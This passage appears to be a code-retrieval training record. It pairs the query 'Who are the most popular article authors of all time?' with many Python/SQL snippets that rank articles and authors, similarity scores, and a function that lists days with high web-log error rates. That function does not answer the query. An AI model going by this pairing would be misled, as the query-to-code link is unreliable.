Task: \" + print_top_authors.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(create_view_top_authors)\n cur.execute(get_popular_artists)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t\\\"{}\\\" - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def more_popular(twitter_data, a, b):\r\n \r\n a_popularity = len(all_followers(twitter_data, a)) \r\n b_popularity = len(all_followers(twitter_data, b))\r\n if a_popularity > b_popularity:\r\n return -1\r\n if a_popularity < b_popularity:\r\n return 1\r\n return username_first(twitter_data, a, b)", "def get_n_authors(soup):\n n_authors = len(soup.find_all(attrs={\"name\":\"Author\"}))\n return(n_authors)", "def _get_sorted_trend_setters(authors: list) -> dict:\n\n trend_setters = {author: authors.count(author) for author in authors}\n top_trend_setters = dict(sorted(\n trend_setters.items(), key=lambda item: item[1], reverse=True\n ))\n return top_trend_setters", "def more_popular(twitter_data, a, b):\n\n a_popularity = len(all_followers(twitter_data, a))\n b_popularity = len(all_followers(twitter_data, b))\n if a_popularity > b_popularity:\n return -1\n if a_popularity < b_popularity:\n return 1\n return username_first(twitter_data, a, b)", "def author_entity_frequency_and_popularity(self, author_id):\n return self.db.execute(u'''\n SELECT e.entity, author_freq, SUM(e.frequency) AS entity_popularity, years, max_rho\n FROM entities AS e,\n (\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ) as d_e\n WHERE d_e.entity == e.entity GROUP BY e.entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def query2():\n\n print(\"2. 
Who are the most popular article authors of all time?\\n\")\n\n query = \"\"\"\n SELECT authors.name, subq_author.hits FROM authors\n LEFT JOIN\n (SELECT articles.author, CAST(SUM(subq_article.hits) AS INTEGER)\n AS hits FROM articles\n LEFT JOIN\n (SELECT COUNT(log.path) AS hits, log.path FROM log\n WHERE log.path LIKE '/article/%'\n AND log.status = '200 OK' AND log.method = 'GET'\n GROUP BY log.path) AS subq_article\n ON subq_article.path LIKE '/article/'||articles.slug\n GROUP BY articles.author) AS subq_author\n ON authors.id = subq_author.author\n ORDER BY subq_author.hits DESC;\n \"\"\"\n\n response = db_query(query)\n\n for i, j in enumerate(response):\n # Convert tuple to list to allow writing. Format \"hits\" with comma\n # seperator. Print output.\n j = list(j)\n j[1] = str(format(j[1], ',d'))\n print(\" Author: '{}' - {} views\".format(*j))", "def most_popular_artist(our_data):\n counter_dict = {}\n for artist in all_artists(our_data):\n if artist in counter_dict:\n counter_dict[artist] += 1\n else:\n counter_dict[artist] = 1\n maximum_albums = max(counter_dict.values())\n artist_lists = []\n for keys, values in counter_dict.items():\n if values == maximum_albums:\n artist_lists.append(keys) \n return artist_lists", "def author_articles(self):\n return ArticlePage.objects.live().filter(author=self).order_by('-date')", "def nauthors(self):\n return self._nauthors", "def get_top_3_articles():\n query1 = \"\"\"select title, count(*) as views\n from articles, log\n where log.path like '%' || articles.slug\n group by title\n order by views desc\n limit 3;\"\"\"\n results = execute_query(query1)\n for result in results:\n print(\"- \\\"%s\\\" — %s views\" % (result[0], result[1]))", "def get_most_viewed_hashtag():\n tags = HashTags.objects.order_by('-no_of_times_viewed').distinct()[:10]\n return tags", "def get_authors_query():\n\n query = '''select authors.name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and substr(log.path,10)=articles.slug\n group by authors.name order by views desc;'''\n\n return query", "def question_2():\n cursor.execute(mostPopAuthors)\n output = cursor.fetchall()\n return output", "def get_most_popular_artists(data):\r\n #list of artists\r\n artists = []\r\n for key in data:\r\n if key[-1] != \"$\":\r\n for x in data[key]:\r\n artists += [x]\r\n sorted_artists = selection_sort(artists)\r\n count = 1\r\n max_count = 1\r\n max_artists = []\r\n for i in range(len(sorted_artists)-1):\r\n #ends at second to last index because I use i and i + 1\r\n if sorted_artists[i] == sorted_artists[i+1]:\r\n count += 1\r\n else:\r\n if count == max_count:\r\n max_artists += [sorted_artists[i]]\r\n count = 1\r\n elif count > max_count:\r\n max_artists = []\r\n max_artists += [sorted_artists[i]]\r\n max_count = count\r\n count = 1\r\n return max_artists", "def ef_iaf_author(self, author_id):\n total_papers = self.total_papers()\n author_entity_frequency = self.author_entity_frequency_and_popularity(author_id)\n author_papers = self.author_papers_count(author_id)\n return sorted(((\n entity,\n entity_author_freq / float(author_papers),\n log(total_papers/float(entity_popularity)),\n entity_author_freq / float(author_papers) * log(total_papers/float(entity_popularity)),\n max_rho,\n [int(y) for y in years.split(\",\")],\n ) for entity, entity_author_freq, entity_popularity, years, max_rho in author_entity_frequency), key=lambda t: t[3], reverse=True)", "def top_three_articles():\n query = \"\"\"select articles.title,\n 
article_path_views.views\n from articles, article_path_views\n where '/article/' || articles.slug = article_path_views.path\n order by views desc\n limit 3\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"The Top Three of Most Viewed Articles:\\n\" + report", "def top_5_news():\n top_five = []\n\n news = (db.news.find({}).sort([\n ('shares_count', pymongo.DESCENDING),\n ('comments_count', pymongo.DESCENDING),\n ('title', pymongo.ASCENDING)\n ]).limit(5))\n\n for new in news:\n top_five.append((new['title'], new['url']))\n\n return top_five", "def get_popular_article():\n query_command = \"SELECT * from popular_posts LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def scrape_author(self, author_name, min_len=0, max_len=9999):\n search = sc.search_author(author_name)\n author = next(search)\n sc.fill(author, sections=['publications'])\n print(author.keys())\n with open(\n 'loadings\\\\authors_papers\\\\{}.txt'.format(author_name),\n 'w',\n encoding='utf-8'\n ) as file:\n for counter, pubblication in enumerate(author['publications']):\n\n if len(pubblication['bib']['title']) < min_len \\\n or len(pubblication['bib']['title']) > max_len:\n continue\n file.write(pubblication['bib']['title'])\n file.write('\\n')\n counter += 1\n if counter > self.hard_limit:\n break", "def get_movie_most_nominations(movies: list) -> str:\n pass", "def top_three_articles(cursor):\n top_articles = 'No articles found'\n try:\n cursor.execute(\"\"\"select title, count(*) as hits\n from articles, log\n where path = ('/article/' || slug)\n group by title\n order by hits desc\n limit 3\n \"\"\")\n article_views = cursor.fetchall()\n # If no articles were found, return\n if len(article_views) <= 0:\n return article_views\n\n except psycopg2.Error as e:\n print('Fetching top articles by views: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any articles, return the results.\n else:\n top_articles = 'Top articles by views: \\r\\n'\n for result in article_views:\n top_articles += ' \"{0} - {1} views\"\\r\\n'.format(result[0],\n result[1])\n return top_articles", "def pubs_by_articles_published( data ) :\n # let's be Pythonic and use counter\n result = [ (k,v) for k,v in Counter([x['SO'] for x in data]).iteritems() ]\n # now sort\n result.sort( lambda a,b : cmp(b[1],a[1]) )\n return result", "def createAuthorArticlePopularityView():\n query = \"\"\"\n CREATE TEMPORARY VIEW author_article_popularity_view AS\n SELECT COUNT(log.path) AS views,\n author_article_view.title AS article,\n author_article_view.author AS author\n FROM author_article_view LEFT JOIN log\n ON log.path LIKE '%' || author_article_view.slug || '%'\n GROUP BY article, author\n ORDER BY views DESC;\n \"\"\"\n connection.cursor().execute(query)", "def get_article_author(self, article_webpage):\n pass", "def get_top_articles(\n limit: int = 5,\n date: int = int(datetime.now().strftime(\"%Y%m%d\"))\n):\n\n res = articles_db.get_top_articles_mongo(\n articles,\n limit,\n date\n )\n\n return res", "def citing_authors(self, entities):\n result = self.db.execute(u'''SELECT DISTINCT(author_id)\n FROM \"entity_occurrences\"\n WHERE entity IN ({}) AND rho > ?'''.format(join_entities_sql(entities)), (DEFAULT_MIN_SCORE,)).fetchall()\n return [t[0] for t in result]", "def directorsOfMostMovies (movies, count):\n directorCounts = {}\n for movieInfo in movies.values():\n key = movieInfo[1]\n if key not in directorCounts:\n 
directorCounts[key] = 0\n directorCounts[key] += 1\n return sorted([ (v, k) for (k,v) in directorCounts.items() ], reverse=True)[:count]\n # OR:\n # directors = [ x[1] for x in movies.values() ]\n # directorSet = set(directors)\n # return sorted([ (directors.count(d), d) for d in directorSet ], reverse=True)[:count]", "def keywords(articles, top_n=25):\n\n # compute term idfs\n token_docs = [lemma_tokenize(clean(a.text)) for a in articles]\n local_term_idf = IDF(token_docs)\n\n token_docs, phrases = extract_phrases(token_docs, [a.text for a in articles], global_term_idf)\n\n titles = [a.title for a in articles]\n title_tokens = [lemma_tokenize(clean(t)) for t in titles]\n term_counts = defaultdict(int)\n for doc in token_docs:\n for t in set(doc):\n if t:\n term_counts[t] += 1\n\n title_terms = set()\n for title_tks in title_tokens:\n title_terms = title_terms | set(title_tks)\n for ph in phrases:\n if any(ph in title.lower() for title in titles):\n title_terms.add(ph)\n\n # Score terms\n term_scores = []\n for t, count in term_counts.items():\n # Ignore numbers, they are very specific to a particular event and\n # introduce noise\n try:\n float(t)\n continue\n except ValueError:\n # TODO This is a troublesome token, not sure why it's not filtered out by\n # IDF. needs more investigation\n if t == 'n\\'t':\n continue\n score = count * (global_term_idf[t] - local_term_idf[t])\n if t in title_terms:\n score *= 1.5\n term_scores.append((t, score))\n\n return sorted(term_scores, key=lambda t: t[1], reverse=True)[:top_n]", "def author_entity_frequency(self, author_id):\n return self.db.execute(u'''\n SELECT entity, COUNT(DISTINCT(document_id)) as author_freq, GROUP_CONCAT(year) as years, MAX(rho) AS max_rho\n FROM entity_occurrences\n WHERE author_id == ? AND rho > ?\n GROUP BY entity\n ''', (author_id, DEFAULT_MIN_SCORE)).fetchall()", "def AuthorsCount(self, default=None):\n return self.data.get('metadata', {}).get('author_count', default)", "def get_most_popular_posts():\n popular_posts_ids = [post.id for post in Post.objects.popular()]\n return Post.objects.filter(id__in=popular_posts_ids). \\\n add_comments_count(). \\\n prefetch_related('author'). \\\n prefetch_with_tags_and_likes(). 
\\\n order_by('likes_count')", "def calculate_most_popular(text, n_populars, steam=False):\n fdist = calculate_fdist(text, steam)\n term = []\n for key, value in fdist.items():\n term.append((key, value))\n term.sort(key=lambda x: int(x[1]), reverse=True)\n return term[:n_populars]", "def top_controversial(self, n):\n return top_movies", "def count_articles(all_articles):\n print(f\"There are {len(all_articles)} articles.\")", "def test_author_many_lastnames(self):\n inv_search = 'author:\"alvarez gaume, j* r* r*\"'\n spi_search = 'find a alvarez gaume, j r r'\n self._compare_searches(inv_search, spi_search)", "def test_discussion_filter_author(self):\n author_vals = (\n ('DoesNotExist', 0),\n ('admin', 1),\n ('jsocol', 4),\n )\n\n for name, number in author_vals:\n u = UserFactory(username=name)\n for i in range(number):\n thread1 = ThreadFactory(title=u'audio')\n PostFactory(thread=thread1, author=u)\n\n self.refresh()\n\n qs = {'a': 1, 'w': 4, 'format': 'json'}\n\n for author, total in author_vals:\n qs.update({'author': author})\n response = self.client.get(reverse('search.advanced'), qs)\n eq_(total, json.loads(response.content)['total'])", "def most_popular(self, n):\n return popular_tags", "def top_articles_by_views(articles, top_x):\n p = PageviewsClient()\n\n # create date string based on previous month\n now = datetime.datetime.now()\n previous_month = str(now.month - 1).zfill(2)\n if previous_month == \"00\": previous_month = \"12\"\n start_date = str(now.year) + previous_month + \"0100\"\n end_date = str(now.year) + previous_month + \"2800\"\n\n # get views\n result = p.article_views('en.wikipedia', articles, \n granularity='monthly', start=start_date, end=end_date)\n # clean results (six is used for backwards compatibility with python 2\n result = six.next(six.itervalues(result))\n sorted_articles = sorted(result.items(), \n key=operator.itemgetter(1), reverse=True)\n return sorted_articles[:top_x]", "def getAuthor(self):\n\t\tself.authorList = [submission.author for submission in self.subreddit.top(time_filter = 'day', limit = self.limits)]\n\t\treturn self.authorList", "def latest_content(request):\n latest_articles = Article.published_articles()[:5]\n latest_comments = Comment.objects.all().order_by('-pub_date')[:5]\n tags = Tag.objects.annotate(num_articles=Count('article')).order_by(\n '-num_articles')\n contributors = Contributor.objects.annotate(\n num_articles=Count('article')).order_by('-num_articles')\n return {'latest_articles': latest_articles,\n 'latest_comments': latest_comments,\n 'tags': tags,\n 'contributors': contributors,\n }", "def get_most_popular_annotations(ambiguous_entity, k=2):\n freq = [(key, len(value)) for key, value in ambiguous_entity.annotated_corpus.items()]\n freq = sorted(freq, key=lambda x: x[1], reverse=True)\n return [x[0] for x in freq[:k]]", "def most_popular(n=5):\n cars = Car.objects.annotate(review_number=models.Count('reviews'))\n sorted_cars = cars.order_by('review_number')\n return sorted_cars[:n]", "def author_visualisation(self, spam_collection):\n\n spam_author_collection = dict.fromkeys(spam_collection)\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] = 1\n\n for data, author_set in spam_collection.iteritems():\n for author in author_set:\n spam_author_collection[author] += 1\n\n spam_list = sorted(spam_author_collection.items(), key=operator.itemgetter(1))\n\n group = []\n values = []\n iterator = 5\n for spam in reversed(spam_list):\n group.append(spam[0])\n 
values.append(spam[1])\n if iterator == 0:\n break\n iterator -= 1\n\n y_pos = np.arange(len(group))\n\n plt.barh(y_pos, values, align='center', alpha=0.5)\n plt.yticks(y_pos, group)\n plt.xlabel('Number of Spam Comments')\n plt.ylabel('YouTube Author')\n plt.title('Top 5 Spamming Authors \\nin YouTube Comment Corpus')\n\n plt.show()", "def get_word_counts(messages_by_author):\n counters_by_author = {}\n for author in messages_by_author.keys():\n author_counter = Counter()\n for message in messages_by_author[author]:\n author_counter += Counter(get_words(string_to_onlyalpha(message.content)))\n counters_by_author[author] = author_counter\n return counters_by_author", "def get_most_popular_merchants(self):\n if self.model:\n return self.model.wv.index_to_key[: self.num_rec]\n else:\n print(\"train the model before performing this step\")\n return None", "def popularity(self, user_list):\n item_popular = Counter(self.train['movieId'].values)\n ret = 0\n n = 0\n print('\\nCalculate popularity: ')\n for user in tqdm(user_list):\n recom_data = self._get_recommend(user)\n for rec in set([data[0] for data in recom_data]):\n ret += math.log(1 + item_popular.get(rec))\n n += 1\n ret /= n * 1.0\n print('\\npopularity: ', ret)\n return ret", "def print_top_articles():\n\n create_view_top_articles = (\n \"CREATE VIEW top_articles AS \" +\n \"SELECT COUNT(path) AS num, path \" +\n \"FROM log GROUP BY path ORDER BY num DESC;\")\n get_popular_articles_names = (\n \"SELECT title, num \" +\n \"FROM top_articles, articles \" +\n \"WHERE top_articles.path = '/article/' || articles.slug limit 3;\")\n\n print(\"\\nRunning Task: \" + print_top_articles.__doc__ + \"\\n\")\n\n conn, cur = connect()\n cur.execute(create_view_top_articles)\n cur.execute(get_popular_articles_names)\n results = cur.fetchall()\n\n for title, views in results:\n print('\\t{} - {} views'.format(title, views))\n\n disconnect(conn, cur)", "def get_artists_most_played(session_):\n # artists = session_.query(Artist).order_by(Artist.name.asc()).paginate()\n artists = session_.query(Artist).order_by(Artist.plays.desc()).all()\n return artists", "def get_top_articles(update=False):\n # use caching to avoid running unnecessary DB queries at each page load\n key = 'top_ten'\n articles = memcache.get(key)\n\n logging.warn('MEMCACHE | Wiki articles %s' % str(articles))\n\n if (articles is None) or (len(articles) == 0) or update:\n # necessary artificial delay when a new article has just been persisted to the datastore\n if update:\n time.sleep(2)\n\n articles = db.GqlQuery('SELECT * FROM Article ORDER BY updated DESC LIMIT 10')\n articles = list(articles)\n memcache.set(key, articles)\n\n logging.warn('DATASTORE | Wiki articles count %s' % str(len(articles)))\n return articles", "def most_missed_creators(self, cache_max_age=0):\n expected_items = []\n query = u'CLAIM[195:%s] AND NOCLAIM[170]' % \\\n ',195:'.join(self.collections) # collection\n wd_queryset = wdquery.QuerySet(query)\n\n wd_query = wdquery.WikidataQuery(cacheMaxAge=cache_max_age)\n data = wd_query.query(wd_queryset)\n\n if data.get('status').get('error') == 'OK':\n expected_items = data.get('items')\n\n creator_dict = {}\n counter = 0\n for q_val in expected_items:\n q_item = self.wd.QtoItemPage(q_val)\n data = q_item.get()\n claims = data.get('claims')\n if u'P170' in claims:\n continue\n descr = data.get('descriptions').get('en')\n if descr and descr.startswith(u'painting by '):\n creator = descr[len(u'painting by '):]\n if '(' in creator: # to get rid of disambiguation addition\n 
creator = creator[:creator.find('(')].strip()\n if creator in creator_dict.keys():\n creator_dict[creator] += 1\n else:\n creator_dict[creator] = 1\n counter += 1\n pywikibot.output(u'Found %d mentions of %d creators' %\n (counter, len(creator_dict)))\n # output\n f = codecs.open(u'creatorHitlist.csv', 'w', 'utf-8')\n for k, v in creator_dict.iteritems():\n f.write(u'%d|%s\\n' % (v, k))\n f.close()", "def get_most_popular(self):\n\t\tpopular_rated = self.data_final[self.data_final['Rating'] == 10]\n\t\tpopular_jokes = popular_rated.groupby('JokeID').count().reset_index()\n\t\tpopular_jokes = popular_jokes[['JokeID','Rating']]\n\t\tpopular_jokes.columns = ['JokeID','Number_rated10']\n\t\ttop_joke = popular_jokes.sort_values(by=['Number_rated10'], ascending=False).head(1)\n\t\ttop_joke_val = top_joke['JokeID'].values[0]\n\t\tjokes_list = sorted(set(self.data_final['JokeID']))\n\t\tjoke_num = jokes_list.index(top_joke_val)\n\t\ttop_joke_desc = self.data_jokes[self.data_jokes['JokeID'] == top_joke_val].values[0][1]\n\n\t\treturn top_joke_desc, joke_num", "def get_authors_count(self, institution):\n return self.db.execute(u'''SELECT COUNT(*) FROM authors WHERE institution==?''', (institution,)).fetchall()[0][0]", "def most_read_book(self):\n reading_max = 0\n most_reads = \"\"\n for book in self.books.keys():\n rating = book.get_average_rating()\n if rating > reading_max:\n most_reads = book\n reading_max = rating\n else:\n continue\n return most_reads", "def count_word_usage(counters_by_author, word_list):\n specific_word_counter = {}\n for author in counters_by_author.keys():\n word_counter = Counter()\n for item in counters_by_author[author]:\n for word in word_list:\n if word in item:\n print(item)\n word_counter[word] += counters_by_author[author][item]\n specific_word_counter[author] = word_counter\n return specific_word_counter" ]
[ "0.8464116", "0.8395627", "0.8325832", "0.8321721", "0.81574434", "0.8025931", "0.7990663", "0.77915514", "0.778007", "0.76863235", "0.7682032", "0.7626295", "0.755735", "0.75209177", "0.74950725", "0.7390242", "0.7380563", "0.7352149", "0.73245054", "0.7269289", "0.7168644", "0.7097385", "0.7026836", "0.7019098", "0.69753695", "0.68759996", "0.6850596", "0.6830917", "0.67495525", "0.6726395", "0.67226905", "0.6663313", "0.66345185", "0.6554077", "0.6538726", "0.65218043", "0.64450175", "0.63916576", "0.6331363", "0.63088685", "0.6284564", "0.62661475", "0.61916816", "0.61582637", "0.6132734", "0.6120747", "0.6076682", "0.6028067", "0.6027632", "0.60107714", "0.60028774", "0.5970349", "0.59578186", "0.5956711", "0.5946971", "0.59469664", "0.5940188", "0.5931153", "0.5917123", "0.59155095", "0.58567554", "0.5846613", "0.583932", "0.5808969", "0.57854813", "0.5781466", "0.57789546", "0.5769289", "0.57679594", "0.57466143", "0.57278633", "0.57258743", "0.5707005", "0.57029", "0.5697988", "0.56897694", "0.5683986", "0.5676653", "0.56738305", "0.56109685", "0.56027204", "0.55958086", "0.5592611", "0.55762315", "0.5574971", "0.5567629", "0.5567177", "0.554649", "0.5497936", "0.5479982", "0.5475885", "0.5474041", "0.5461326", "0.54600626", "0.5457332", "0.5448662", "0.54406965", "0.5438228", "0.54372185", "0.5435583" ]
0.67932266
28
Who are the most popular article authors of all time?
import psycopg2


def getWorstDays():
    """Return days on which more than 1% of requests did not return '200 OK'."""
    db = psycopg2.connect("dbname=news")
    c = db.cursor()
    c.execute(" select c.* from" +
              "(select a.* , b.* , " +
              "(cast( b.total as decimal(16,4))/a.total)*100 as percent from" +
              " (select count(*) total , time::timestamp::date as timea " +
              "from log group by timea order by timea) as a, " +
              "(select count(*) total , time::timestamp::date as timea " +
              "from log where status <> '200 OK' " +
              "group by timea order by timea ) as b " +
              "where a.timea = b.timea) as c where c.percent > 1;")
    days = c.fetchall()
    db.close()
    return days
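For context, the query above computes, per day, the share of requests whose status is not '200 OK' and keeps days where that share exceeds 1%. A hedged usage sketch (assumes a local PostgreSQL "news" database; the five unpacked columns follow from the query's select c.*: a.total, a.timea, b.total, b.timea, percent):

# Hypothetical usage of getWorstDays(); requires the "news" database above.
for total, day, errors, _, percent in getWorstDays():
    print("{:%B %d, %Y} - {:.2f}% errors".format(day, percent))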
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_mostPopularAuthors():\n\n query = \"\"\"\n SELECT authors.name,COUNT(*) as views\n FROM articles join authors\n ON articles.author=authors.id\n JOIN log ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY authors.name\n ORDER BY views DESC\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWho are the most popular article authors of all time?')\n for author, views in posts:\n print(author + \" - \" + str(views) + \" views\")", "def most_popular_authors():\n\n results = query_database(QUERIES[1])\n print('\\nWho are the most popular article authors of all time?\\n')\n for author, views in results:\n print(' * {} -- {} views'.format(author, views))", "def most_popular_authors():\n print '2. The most popular authors are...'\n return (\"\"\"SELECT authors.name, count(*) as num from\"\"\"\n \"\"\" authors, articles, log WHERE SUBSTRING (log.path FROM 10)\"\"\"\n \"\"\" = articles.slug and articles.author = authors.id and\"\"\"\n \"\"\" log.path != '/' Group By authors.name ORDER by num\"\"\"\n \"\"\" DESC LIMIT 20;\"\"\")", "def most_popular_article_authors():\n\n # To print information\n information_string = '2. The most popular article ' \\\n 'authors of all time are:\\n'\n\n # Query string\n query = \"\"\" select x.author , count(1) as qtd from (\n SELECT b.name as author\n FROM articles a join authors b on(a.author = b.id)\n join log c on(c.path = '/article/' ||a.slug)\n ) x group by x.author order by 2 desc;\"\"\"\n\n print(information_string)\n for result in query_db(query):\n print('\\t' + str(result[0]) + ' - ' + str(result[1]) + ' views')\n\n print(\"\\n\")", "def popular_authors() :\n query = \"\"\"SELECT authors.name,count(*) AS total_views FROM authors,articles,log WHERE log.path like concat ('/article/',articles.slug)\n AND articles.author=authors.id group by authors.name order by total_views desc\"\"\"\n result = get_data(query)\n print(\" 2. 
The most popular articles authors of all time:\")\n print(\"\")\n for record in result :\n print(' ' +' ' + str(record[0]) + ' -' + ' ' + str(record[1]) + ' ' +'views')\n print(\" \")", "def top_authors():\n\n cur.execute(\"\"\"\n SELECT author, count(*) AS article_author\n FROM article_summary\n GROUP BY author\n ORDER BY article_author DESC;\n \"\"\")\n result = cur.fetchall()\n return result", "def get_most_popular_authors():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\" select t1.name,count(*) as total from authors as t1, articles as t2,log as t3 where t3.path=concat('/article/',t2.slug) and t1.id=t2.author group by t1.name order by total desc limit 3;\")\n\tdata = c.fetchall()\n\tdb.close()\n\n\treturn data", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n query_popular_authors = \"\"\"\n SELECT aut.name, COUNT(lg.id) AS views\n FROM articles AS art\n JOIN log AS lg ON art.slug = SUBSTRING(lg.path,10)\n AND lg.status = '200 OK'\n JOIN authors AS aut ON aut.id = art.author\n GROUP BY aut.name\n ORDER BY views desc; \"\"\"\n c.execute(query_popular_authors)\n authors = from_db_cursor(c)\n db.close()\n return authors", "def popular_authors():\n query = \"\"\"select authors.name, sum(views)\n from authors, articles, article_path_views\n where authors.id = articles.author\n and '/article/' || articles.slug = article_path_views.path\n group by authors.name\n order by sum desc\"\"\"\n result_table = execute_query(query)\n\n # generate a report from table_to_report() function\n report = table_to_report(result_table, ' views')\n return \"Authors and Their Articles' Total Views:\\n\" + report", "def author_rank():\n db, c = connect(DBNAME)\n c.execute(\"select name, count(name) as views from \\\"authorpath\\\" \"\n \"group by name order by views desc\")\n author_table = c.fetchall()\n db.close()\n print \"\\nMost Popular Article Authors of All Time:\"\n for author in author_table:\n print str(author[0]) + \" - \" + str(author[1]) + \" views\"", "def most_viewed_authors():\n query = \"\"\"\n SELECT authors.name, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n JOIN authors\n ON authors.id = articles.author\n WHERE log.status ='200 OK'\n GROUP BY authors.name ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed authors:\")\n for result in results:\n print '{author} - {count} views'.format(\n author=result[0], count=result[1])", "def get_popular_authors():\n db = psycopg2.connect(database=DBNAME)\n c = db.cursor()\n # counting views that had status 200\n c.execute(\"select authors.name, count(*) as num \"\n \"from articles, authors, log \"\n \"where articles.author = authors.id \"\n \"and log.path like concat('%', articles.slug, '%') \"\n \"and log.status = '200 OK' \"\n \"group by authors.name order by num desc\")\n results = c.fetchall()\n text_file = open(\"text.txt\", \"a+\") # append to text file\n text_file.write(\"The most popular authors of all time are:\\n\\n\")\n # for loop to print each author\n for name, num in results:\n text_file.write(\"\\\"\" + name + \"\\\"\" + \" - \" + str(num) + \" views\\n\")\n text_file.write(\"\\n\")\n text_file.close()\n db.close", "def print_top_authors():\n\n output = get_query_results(\n '''SELECT authors.name, COUNT(*) AS views\n FROM authors\n JOIN(SELECT articles.title, articles.author FROM articles\n JOIN log ON log.path=CONCAT('/article/', articles.slug))\n AS popular\n ON 
authors.id=popular.author\n GROUP BY name\n ORDER BY views DESC;'''\n )\n print(\"\\nPopularity of Authors: \\n\")\n for author, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(author, views))", "def get_top_authors():\n query2 = \"\"\"select name, count(*) as views\n from authors, articles, log\n where authors.id = articles.author\n and log.path like '%' || articles.slug\n group by name\n order by views desc;\"\"\"\n results = execute_query(query2)\n for result in results:\n print(\"- %s — %s views\" % (result[0], result[1]))", "def print_popular_authors(authors):\n for (author, views) in authors:\n print \"%s - %d views\" % (author, views)", "def printTopAuthors():\n query = \"\"\"\n SELECT author_article_popularity_view.author,\n SUM(author_article_popularity_view.views) AS total_views\n FROM author_article_popularity_view\n GROUP BY author_article_popularity_view.author\n ORDER BY total_views DESC;\n \"\"\"\n cursor = connection.cursor()\n cursor.execute(query)\n results = cursor.fetchall()\n print(\"\\nTop authors of all time: \")\n for i, result in enumerate(results):\n print(\"{}. {} - {:,} views\".format(i + 1, result[0], result[1]))", "def topAuthors():\n c = db.cursor()\n c.execute(\"select name, sum(hits) as hits\\\n from authorhits group by name\\\n order by hits desc;\")\n results = c.fetchall()\n c.close()\n return results", "def most_popular_articles():\n print '1. The most popular articles are...'\n return (\"\"\"SELECT articles.title, COUNT(*) as num FROM articles, log\"\"\"\n \"\"\" WHERE SUBSTRING (log.path FROM 10) = articles.slug and\"\"\"\n \"\"\" log.path != '/' Group By articles.title ORDER By num\"\"\"\n \"\"\" DESC LIMIT 3;\"\"\")", "def most_popular_articles():\n\n results = query_database(QUERIES[0])\n print('\\nWhat are the most popular three articles of all time?\\n')\n for title, views in results:\n print(' * \"{}\" -- {} views'.format(title, views))", "def print_popular_authors():\n print(\"\\nAuthors listed by article views:\\n\")\n views_data = get_query_results(AUTHORS_VIEWS_QUERY)\n author_row_format = '{} - {} views'\n for author, views in views_data:\n print(author_row_format.format(author, views))", "def top_authors(cursor):\n top_auth = 'No authors found.'\n try:\n cursor.execute(\"\"\"\n select name, hits\n from authors, views_by_id as views_by_id\n where id = author\n group by name, hits\n order by hits desc\"\"\")\n\n authors = cursor.fetchall()\n # If no authors were found, return\n if len(authors) <= 0:\n return top_auth\n\n except psycopg2.Error as e:\n print('Fetching authors by popularity: \\r\\n{}'.format(e.pgerror))\n\n # If the query returns any authors, return the results.\n else:\n top_auth = 'Top authors by article views: \\r\\n'\n for auth in authors:\n top_auth += ' {} - {} views\\r\\n'.format(auth[0], auth[1])\n return top_auth", "def get_mostViewedArticles():\n\n query = \"\"\"\n SELECT articles.title,COUNT(*) as views\n FROM articles JOIN log\n ON log.path LIKE ('/article/' || articles.slug)\n GROUP BY articles.title\n ORDER BY views DESC\n LIMIT 3\n \"\"\"\n\n posts = execute_query(query)\n print('\\nWhat are the most popular three articles of all time?')\n for title, views in posts:\n print(title + \" - \" + str(views) + \" views\")", "def print_top_articles():\n\n output = get_query_results(\n '''SELECT articles.title, COUNT(path) AS views\n FROM articles\n JOIN log\n ON log.path=CONCAT('/article/', articles.slug)\n GROUP BY title\n ORDER BY views DESC\n LIMIT 3;'''\n )\n print(\"\\nMost Popular Articles: \\n\")\n for 
title, views in output:\n print(\"\\\"{}\\\" -- {} views\".format(title, views))", "def get_popular_authors():\n query_command = \"SELECT * from popular authors LIMIT 3\"\n query_data = run_query(query_command)\n return query_data", "def popular_articles():\n query = \"\"\"SELECT articles.title,count(*) AS total_views FROM articles,log WHERE log.path like concat('/article/',articles.slug)\n group by articles.title order by total_views desc limit 3\"\"\"\n result = get_data(query)\n print(\" 1. The most popular three articles of all time:\")\n print(\"\")\n for record in result :\n print(' ' + '\\\"' + str(record[0]) + '\\\"' + '-' + ' ' + str(record[1]) + ' '+ 'views')\n print(\" \")", "def get_most_popular_articles():\n\tdb = psycopg2.connect(database=DBNAME)\n\tc = db.cursor()\n\tc.execute(\"select t2.title, count(*) as total from log as t1,articles as t2 where t1.path=concat('/article/',t2.slug) group by t2.title order by total desc limit 3 ;\")\n\tdata = c.fetchall()\n\tdb.close()\n\treturn data", "def most_viewed_articles():\n query = \"\"\"\n SELECT articles.title, COUNT(*) AS views\n FROM articles\n JOIN log\n ON log.path = '/article/' || articles.slug\n WHERE log.status ='200 OK'\n GROUP BY articles.title ORDER BY views DESC LIMIT 3;\n \"\"\"\n results = psql_connection(query)\n\n print(\"Most viewed articles:\")\n for result in results:\n print '{article} - {count} views'.format(\n article=result[0], count=result[1])", "def count_by_author(all_articles):\n author_count = {}\n\n for title in all_articles:\n author = \", \".join(all_articles[title]['authors'])\n if author not in author_count:\n author_count[author] = 1\n else:\n author_count[author] = author_count[author] + 1\n \n print_all_items_in_dict(author_count)", "def getPopualrAuthors():\n db = psycopg2.connect(\"dbname=news\")\n c = db.cursor()\n c.execute(\" select count(*) as views , 